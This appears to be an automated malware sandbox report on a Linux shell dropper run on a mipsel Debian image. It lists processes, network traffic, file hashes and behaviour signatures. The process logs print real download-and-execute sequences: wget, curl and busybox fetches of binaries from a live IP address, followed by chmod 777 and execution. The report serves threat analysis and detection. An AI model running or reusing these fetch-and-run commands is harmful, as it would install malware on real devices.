/tmp/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj
[./HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj]
/bin/rm
[rm HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj]
/usr/bin/wget
[wget http://87.120.126.196/bins/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM]
/bin/chmod
[chmod 777 aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM]
/tmp/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM
[./aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM]
/bin/rm
[rm aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM]
/usr/bin/wget
[wget http://87.120.126.196/bins/Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2]
/bin/chmod
[chmod 777 Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2]
/tmp/Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2
[./Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2]
/bin/rm
[rm Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2]
/usr/bin/wget
[wget http://87.120.126.196/bins/KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn]
/bin/chmod
[chmod 777 KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn]
/tmp/KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn
[./KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn]
/bin/rm
[rm KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn]
/usr/bin/wget
[wget http://87.120.126.196/bins/DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO]
/bin/chmod
[chmod 777 DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO]
/tmp/DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO
[./DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO]
/bin/rm
[rm DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO]
/usr/bin/wget
[wget http://87.120.126.196/bins/jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy]
/bin/chmod
[chmod 777 jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy]
/tmp/jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy
[./jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy]
/bin/rm
[rm jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy]
/usr/bin/wget
[wget http://87.120.126.196/bins/Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt]
/bin/chmod
[chmod 777 Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt]
/tmp/Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt
[./Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt]
/bin/rm
[rm Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt]
/usr/bin/wget
[wget http://87.120.126.196/bins/Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq]
/bin/chmod
[chmod 777 Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq]
/tmp/Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq
[./Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq]
/bin/rm
[rm Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq]
/usr/bin/wget
[wget http://87.120.126.196/bins/5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK]
/bin/chmod
[chmod 777 5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK]
/tmp/5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK
[./5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK]
/bin/rm
[rm 5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK]
/usr/bin/wget
[wget http://87.120.126.196/bins/RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr4]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr4]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr4]
/bin/chmod
[chmod 777 RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr4]
/tmp/RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr4
[./RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr4]
/bin/rm
[rm RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr4]
/usr/bin/wget
[wget http://87.120.126.196/bins/BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge2]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge2]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge2]
/bin/chmod
[chmod 777 BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge2]
/tmp/BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge2
[./BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge2]
/bin/rm
[rm BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge2]
/usr/bin/wget
[wget http://87.120.126.196/bins/3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI]
/bin/chmod
[chmod 777 3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI]
/tmp/3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI
[./3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI]
/bin/rm
[rm 3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI]
/usr/bin/wget
[wget http://87.120.126.196/bins/F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw]
/bin/chmod
[chmod 777 F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw]
/tmp/F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw
[./F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw]
/bin/rm
[rm F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw]
Network
| Country | Destination | Domain | Proto |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
Files
/tmp/DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
Analysis: behavioral4
Detonation Overview
Submitted
2024-10-25 01:27
Reported
2024-10-25 01:30
Platform
debian9-mipsel-20240729-en
Max time kernel
60s
Max time network
62s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO | /tmp/DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO | N/A |
| N/A | /tmp/jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy | /tmp/jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy | N/A |
| N/A | /tmp/Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt | /tmp/Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt | N/A |
| N/A | /tmp/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM | /tmp/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM | N/A |
| N/A | /tmp/Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2 | /tmp/Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2 | N/A |
| N/A | /tmp/KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn | /tmp/KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn | N/A |
| N/A | /tmp/5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK | /tmp/5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK | N/A |
| N/A | /tmp/Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq | /tmp/Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq | N/A |
| N/A | /tmp/BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge2 | /tmp/BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge2 | N/A |
| N/A | /tmp/3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI | /tmp/3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI | N/A |
| N/A | /tmp/F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw | /tmp/F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw | N/A |
| N/A | /tmp/RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr4 | /tmp/RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr4 | N/A |
| N/A | /tmp/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj | /tmp/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj | N/A |
| N/A | /tmp/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz | /tmp/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz | N/A |
| N/A | /tmp/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz | /tmp/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz | N/A |
| N/A | /tmp/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj | /tmp/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj | N/A |
| N/A | /tmp/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM | /tmp/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM | N/A |
| N/A | /tmp/Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2 | /tmp/Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2 | N/A |
| N/A | /tmp/KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn | /tmp/KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn | N/A |
| N/A | /tmp/DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO | /tmp/DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO | N/A |
| N/A | /tmp/jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy | /tmp/jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy | N/A |
| N/A | /tmp/Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt | /tmp/Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt | N/A |
| N/A | /tmp/Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq | /tmp/Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq | N/A |
| N/A | /tmp/5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK | /tmp/5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK | N/A |
| N/A | /tmp/RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr4 | /tmp/RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr4 | N/A |
| N/A | /tmp/BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge2 | /tmp/BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge2 | N/A |
| N/A | /tmp/3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI | /tmp/3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI | N/A |
| N/A | /tmp/F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw | /tmp/F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /tmp/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /tmp/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq | /usr/bin/curl | N/A |
| File opened for modification | /tmp/RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr4 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq | /usr/bin/curl | N/A |
| File opened for modification | /tmp/5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK | /usr/bin/curl | N/A |
| File opened for modification | /tmp/F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj | /usr/bin/curl | N/A |
| File opened for modification | /tmp/3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI | /usr/bin/curl | N/A |
| File opened for modification | /tmp/DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt | /usr/bin/curl | N/A |
| File opened for modification | /tmp/5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK | /usr/bin/curl | N/A |
| File opened for modification | /tmp/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz | /usr/bin/curl | N/A |
| File opened for modification | /tmp/RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr4 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn | /usr/bin/curl | N/A |
| File opened for modification | /tmp/3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI | /usr/bin/curl | N/A |
| File opened for modification | /tmp/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM | /usr/bin/curl | N/A |
| File opened for modification | /tmp/BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge2 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge2 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt | /usr/bin/curl | N/A |
| File opened for modification | /tmp/jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy | /usr/bin/curl | N/A |
| File opened for modification | /tmp/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw | /usr/bin/curl | N/A |
| File opened for modification | /tmp/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj | /usr/bin/curl | N/A |
| File opened for modification | /tmp/DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO | /usr/bin/curl | N/A |
| File opened for modification | /tmp/jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy | /usr/bin/curl | N/A |
Processes
/tmp/402e66b3e2faed23ffb7e204f5124182b7d88aefafaee1cabd25d2e1753ca7bb.sh
[/tmp/402e66b3e2faed23ffb7e204f5124182b7d88aefafaee1cabd25d2e1753ca7bb.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://87.120.126.196/bins/DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO]
/bin/chmod
[chmod 777 DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO]
/tmp/DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO
[./DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO]
/bin/rm
[rm DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO]
/usr/bin/wget
[wget http://87.120.126.196/bins/jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy]
/bin/chmod
[chmod 777 jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy]
/tmp/jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy
[./jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy]
/bin/rm
[rm jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy]
/usr/bin/wget
[wget http://87.120.126.196/bins/Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt]
/bin/chmod
[chmod 777 Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt]
